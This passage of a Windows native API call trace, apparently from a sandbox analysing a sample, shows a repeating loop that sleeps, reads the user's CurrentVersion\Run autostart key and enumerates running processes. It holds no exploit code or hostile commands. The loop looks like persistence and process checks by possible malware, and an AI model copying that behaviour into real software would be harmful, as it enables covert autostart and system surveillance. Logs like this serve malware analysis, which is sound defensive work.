NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.943] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.944] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.944] NtClose (Handle=0x378) returned 0x0 [0304.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.955] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.956] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.958] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.958] NtClose (Handle=0x378) returned 0x0 [0304.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.120] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.122] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.122] NtClose (Handle=0x378) returned 0x0 [0305.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.179] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.181] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.181] NtClose (Handle=0x378) returned 0x0 [0305.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.193] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.195] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.195] NtClose (Handle=0x378) returned 0x0 [0305.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.206] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.208] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.209] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.209] NtClose (Handle=0x378) returned 0x0 [0305.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.218] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.220] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.221] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.221] NtClose (Handle=0x378) returned 0x0 [0305.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.229] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.231] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.232] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.232] NtClose (Handle=0x378) returned 0x0 [0305.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.241] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.242] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.245] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.245] NtClose (Handle=0x378) returned 0x0 [0305.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.263] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.265] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.265] NtClose (Handle=0x378) returned 0x0 [0305.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.276] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.278] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.279] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.279] NtClose (Handle=0x378) returned 0x0 [0305.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.290] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.292] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.294] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.294] NtClose (Handle=0x378) returned 0x0 [0305.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.305] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.307] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.308] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0305.308] NtClose (Handle=0x378) returned 0x0 [0305.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0305.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0305.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0305.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0305.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0305.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0305.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0305.321] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0305.322] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, 